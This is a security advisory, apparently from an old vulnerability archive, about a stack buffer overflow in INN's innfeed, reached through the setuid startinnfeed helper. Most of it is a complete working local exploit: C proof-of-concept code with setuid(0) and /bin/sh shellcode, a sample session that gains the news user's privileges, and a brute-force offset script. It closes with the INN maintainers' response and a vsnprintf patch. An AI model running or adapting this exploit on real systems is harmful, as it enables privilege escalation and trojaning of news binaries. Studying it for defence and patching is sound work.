COMMAND
innfeed
SYSTEMS AFFECTED
INN
PROBLEM
Following is based on a Defcom Labs Advisory def-2001-23 by Alex
Hernandez and Enrique A. Sanchez Montellano. innfeed is a program
that implements the NNTP protocol for transerring news between
computers.
Due to no bounds checking on the innfeed program a buffer overflow
occurs while using the -c flag, thus rendering complete control
of the stack. And rendering news uid and gid.
Due to no bounds checking on the logOrPrint() function on the
vsprint() a stack overflow occurs thus rendering the stack. The
user then is able to gain news id, in wich he can the trojan
binaries to gain further access to upgrade his priviledges.
Users trusted to group id can gain further access to news uid thus
gaining owner priviledges on the files and being able to trojan
them in some cases. And if root runs those binaries a root
compromise might be posible.
Offending code:
vsprintf (buffer,fmt,ap) ;
Example of exploitation:
nahual@shell:~$ ls -al /usr/lib/news/bin/innfeed
-r-xr-x--- 1 news news 213124 Jun 14 2000
/usr/lib/news/bin/innfeed*
nahual@shell:~$ ls -al /usr/lib/news/bin/startinnfeed
-r-sr-x--- 1 root news 40796 Jun 14 2000
/usr/lib/news/bin/startinnfeed*
nahual@shell:~$ id
uid=1001(nahual) gid=100(users) groups=100(users),13(news)
nahual@shell:~$ ./x-innfeed
[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]
------------------------------------------------------------
[ + ] Found by:
[ + ] Alex Hernandez (alex.hernandez@defcom.com)
[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)
[ + ] Defcom Labs @ Spain ....
[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)
[ + ] Using address 0xbffff9e4
[ + ] Starting exploitation ...
bash$ id
uid=9(news) gid=13(news) groups=100(users),13(news)
bash$
Proof of concept code:
/*
x-innfeed.c
Buffer overflow in innfeed being called from startinnfeed renders
uid(news) gid(news), startinnfeed is suid root so I have to also check
if I can manage to get root out of this ....
Enrique A. Sanchez Montellano
(@defcom.com ... Yes is only @defcom.com)
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 0
#define ALIGN 0
#define BUFFER 470
// MANDRAKE, REDHAT, etc....
#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
//static char shellcode[]=
//"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#endif
#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[]=
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void usage(char *name) {
printf("Usage: %s <offset> <align> <buffer>\n", name);
printf("Defcom Labs @ Spain ...\n");
printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
exit(0);
}
int main(int argc, char **argv) {
char *code;
int offset = OFFSET;
int align = ALIGN;
int buffer = BUFFER;
unsigned long addr;
int i;
if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) align = atoi(argv[2]);
if(argc > 3) buffer = atoi(argv[3]);
code = (char *)malloc(buffer);
printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
printf("------------------------------------------------------------\n");
printf("[ + ] Found by: \n\n[ + ] Alex Hernandez
(alex.hernandez@defcom.com) \n[ + ] Enrique Sanchez (@defcom.com ... Yes
is just @defcom.com)\n");
printf("[ + ] Defcom Labs @ Spain ....\n");
printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");
addr = get_sp() - offset;
printf("[ + ] Using address 0x%x\n", addr);
for(i = 0; i <= buffer; i += 4) {
*(long *)&code[i] = 0x90909090;
}
*(long *)&code[buffer - 4] = addr;
*(long *)&code[buffer - 8] = addr;
memcpy(code + buffer - strlen(shellcode) -8 - align, shellcode,
strlen(shellcode));
printf("[ + ] Starting exploitation ... \n\n");
// REDHAT, MANDRAKE ...
#ifdef REDHAT
execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif
// SLACKWARE
#ifdef SLACKWARE
execl("/usr/lib/news/bin/startinnfeed",
"/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif
return 0;
}
--- brute.sh ---
#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 1`
./x-startinnfeed $L
done
This exploit will not affect most installed INN systems, and is,
*primarily* a documentation issue (although there are indeed
security issues, the main one of which has already been addressed
in current versions of INN).
If you have users other than the news user in the news group on a
system with INN installed, this issue affects you; read on. If
you don't, this issue does not (unless you somehow have a
misinstalled startinnfeed).
Above affects versions of INN prior to INN 2.3.0. startinnfeed
was rewritten in INN 2.3.0 and will no longer execute unless run
as the news user (the only user to which it will then setuid()
to), making buffer overflows in innfeed irrelevant from a security
standpoint.
This particular buffer overflow is nonetheless fixed as a quality
of implementation issue in the current CVS tree and that fix will
be in the next release (in a different way than the patch provided
in this advisory, since the change recommended in this advisory
required vsnprintf).
SOLUTION
Defcom has issued a patch for the vulnerability:
210c210
< vsprintf (buffer,fmt,ap) ;
---
> vsnprintf (buffer,512,fmt,ap) ;
This patch applies to innfeed/misc.c.
The recomended action is to upgrade to version 2.3.1 wich is not
vulnerable to this attack due that you have to be news to execute
the script. root should not run any of this commands as an
administrative task trusted users should do this.
INN 2.4.0 when released will probably *not* continue the policy of
installing configuration files group-writeable by default, since
we don't believe that this is the way most news servers are
configured these days.